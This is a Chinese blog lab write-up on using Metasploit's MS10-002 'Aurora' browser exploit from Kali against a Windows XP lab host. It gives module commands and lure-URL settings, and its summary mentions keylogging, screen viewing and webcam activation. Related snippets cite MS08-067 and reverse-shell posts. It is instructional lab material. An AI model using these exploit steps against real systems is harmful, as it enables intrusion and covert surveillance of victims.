云安全试验二

最新推荐文章于 2022-11-29 15:20:52 发布
最新推荐文章于 2022-11-29 15:20:52 发布
阅读量647 收藏 2
点赞数 1
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ifeeexxj/article/details/103777753
版权
本文介绍了使用Kali Linux进行渗透测试的过程,通过msfvenom搜索并利用MS10-002漏洞,设置srvhost和lhost为Kali的IP地址,诱导XP主机访问特定URL。成功入侵后,可以调用功能如记录键盘输入、查看目标屏幕及激活摄像头进行远程监控。
摘要由CSDN通过智能技术生成

渗透试验二

查看kali的IP地址
在这里插入图片描述

搜索漏洞
msf > search ms10-002
在这里插入图片描述
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set srvhost 192.168.4.109
msf exploit(ms10_002_aurora) > set lhost 192.168.4.109
msf exploit(ms10_002_aurora) > set uripath aurora.html
在这里插入图片描述
这里的srvhost、lhost地址都是kali的IP地址
exploit
得到诱导的URL
在这里插入图片描述
在XP主机内输入诱导的URL地址

最低0.47元/天 解锁文章
Tee.
关注
云安全实验一
Ifeeexxj的博客
12-30 822
渗透实验一 msf > search ms08-067 搜索ms08-067相关漏洞的攻击模块 msf > use exploit/windows/smb/ms08_067_netapi 使用刚才搜索到的漏洞 msf exploit(ms08_067_netapi) > set rhost 192.168.0.109 设置要攻击的目标主机ip msf exploit(ms08...
云安全技术应用实训
所念jie星河
06-27 556
课程:云安全技术应用实训 题目及要求: 1、以自己姓名在物理机D:创建一个文件夹,如:张三;创建个本地用户user-1、user-2和本地组SCB、YFB,user-1为组SCB的成员,user-2为组YFB的成员;对所创建的文件夹如张三,设置权限,SCB权限为:读取和执行、列出文件夹内容、读取;YFB权限为:读取和执行、列出文件夹内容、读取、写入。 对配置的重要过程或结果进行截图。 (1)查看本地用户:user-1、user-2的截图 (5分)net user(或此电脑-属性-本地用户和组-用户-查看创
云计算安全实验-Linux环境下KVM的安装和使用
taylorswift的博客
07-07 2960
一、实验目的 熟悉Linux环境下KVM的安装和使用、实验环境 centos 7三、实验步骤0、安装VMWare并在其上安装运行Linux虚拟机,并配置和宿主机的文件共享(注意开启虚拟机的CPU VT-x支持)开启虚拟机的CPU VT-x支持 将镜像文件导入虚拟机,我采用了FTP传输,未采用文件共享的方式。1、检查Linux host对虚拟化的支持(CPU vmx标志位和kvm内核模块)查看CPU是否支持虚拟化 cat /proc/cpuinfo | egrep ‘vmx|svm’ 找到flags部分
云计算安全实验-MapReduce安装与简单使用
taylorswift的博客
07-07 3063
一、安装Hadoop1. 创建Hadoop用户 创建用户命令如下: sudo useradd -m hadoop -s /bin/bash 接着为 hadoop 用户设置密码 sudo passwd hadoop 然后为 hadoop 用户增加管理员权限: sudo adduser hadoop sudo 切换用户为hadoop登录 su hadoop 2.更新apt和安装Vim编辑器首先更新 apt: sudo apt-get update 接着安装 Vim 编辑器: sudo apt-get
实验5 云计算安全
weixin_57848728的博客
11-29 1072
云计算安全1
实验室安全培训作业答案雨课堂/学堂云
04-13
2. **实验室安全操作流程**:这部分题目主要考察实验室实验操作过程中的安全规范。 - **DABDABDACDABD**:可能涉及到实验前准备工作的检查清单、实验后清理工作的步骤等。 - **ABCDABCDEABABCDE对**:可能涉及到...
信息安全云实验平台解决方案
12-15
、信息安全实验室设计理念及目标 信息安全实验室的设计理念侧重于模拟真实的信息安全攻防环境,通过实验教学和实际操作,提高学生和研究人员的实践操作能力,同时培养他们在信息安全领域的创新能力和科研能力。 ...
深信服安全PT2实验视频.zip
最新发布
01-14
深信服安全PT2实验视频
基于云服务器的实验室安全检测系统的设计.pdf
07-24
基于云服务器的实验室安全检测系统设计所涉及的知识点主要包括以下几个方面: 1. 实验室安全需求:在实验室环境中,维护安全是一项至关重要的任务。实验室可能存在的安全风险包括电力事故、火灾、有害气体泄露、...
物联网安全与隐私实验报告
05-25
实验可能关注物联网设备的固件安全,包括固件更新的安全流程、漏洞检测与修复。实验可能涵盖了如何分析固件中的潜在风险,以及如何通过安全的固件更新机制防止恶意代码注入。 实验三可能探讨的是物联网传感器数据...
【阿里云ECS进阶训练营】day05ACA认证云上安全防护实验汇总
池鱼
07-02 862
实验列表实验一:云上安全防护 实验一:云上安全防护
阿里云网络和安全配置实验(云计算)
Hdhdi的博客
07-21 1576
一、实验目的 1.了解阿里VPC服务的配置和使用方法。 2.使用VPC服务创建一个私有云网络。 3.为不同的云主机创建安全组。 、实验内容 第一部分:创建和使用专有网络。 第部分:使用VPN连接专有网络。 三、实验步骤及结果分析 第一部分:创建和使用专有网络 1.创建专有网络 在阿里云的产品与服务中选择专有网络VPC,如图1-1所示。 图1-1阿里云专有网络VPC ...
云安全部分概念解析
chenxiaofanzz的博客
10-16 1286
以下概念来自《云计算安全:技术与应用》,中国电信网络安全实验室 编著。 资源池化:云服务提供商提供容量充足的资源池,以保证在业务高峰时仍能满足用户需求。虚拟化:用户无需了解云底层结构,他感觉到使用的是独立完整的设备或计算资源。这需要再资源池化的基础上讲资源按照业务需求划分为多组业务单元并提供给不同用户。云安全三个层次: (1)SaaS的online软件安全,各类云杀毒。利用在线软件
Nagios安装配置
chenming08的博客
07-04 236
知识目标: 掌握Nagios监控 技能目标: 掌握Nagios监控服务的搭建和配置 实训环境: 静态网络地址的配置 主机名配置 配置本地yum源 关闭selinux服务,关闭防火墙 Nagios-server的安装 创建Nagios用户和组 安装Nagios 目录核对正确则表示安装成功 安装邮件服务 启动服务 测试 指定接受警告信息的邮件地址 修改...
云安全技术——云主机端口扫描
weixin_43361166的博客
01-03 4521
【实验目的】 1.掌握安全扫描的概念、意义及应用分析; 2.掌握排除扫描目标的命令行用法; 3.掌握Nmap扫描存活主机的意义、相关知识基础; 4.掌握如何识别远程机器的系统版本; 5.识别目标主机所开放端口上的应用; 6.利用Nmap扫描器对指定目标主机进行服务或版本探测; 7.利用Nmap扫描器躲避防火墙,完成若干常用扫描; 【实验要求】 1.掌握Nmap扫描器的安装; 2.针对特定扫描目的,掌握Namp扫描器的参数方法; 3.用Nmap指定和排除扫描目标; 4.使用Nmap进行存活主机扫描; 5.使用
MSF渗透实验
weixin_51646864的博客
08-11 1568
浏览器攻击渗透(MS10_018) 环境: 1、虚拟机Windows2003系统(靶机) 2、虚拟机linux2020.2(攻击机) 步骤: 一、启动虚拟机linux2020.2,终端输入msfconsole启动 、输入指令search ms10_018查看一下,这是2010年的浏览器漏洞。 三、接下来搜索ie浏览器:输入指令search ie 回车后可以看到关于ie浏览器历史漏洞 四、这里选择2010年的漏洞进行实验。输入指令: use exploit/windows/browser/ms10_0
内网渗透笔记-端口转发,内网代理
pyphrb的博客
07-28 9215
0x01 内网代理和转发1.1 正向代理(Forward Proxy)Lhost--》proxy--》Rhost Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。1.2 反向代理(reverse proxy)Lhost<--->proxy<-
Exp5 MSF基础应用 20154302 薛师凡
weixin_34013044的博客
04-20 126
Exp5 MSF基础应用 20154302 薛师凡 一、基础问题回答 (1)用自己的话解释什么是 exploit , payload , encode. exploit: 是破除门锁的工具以及运送间谍的载具,相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。 payload: 就是被运送的间谍,到了房子里头就可以执行各种间谍活动。简单来说就是病毒代码包装成一个可执行的文件,或者包装成...
渗透测试-window反弹shell
lza20001103的博客
05-11 4930
window反弹shell
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值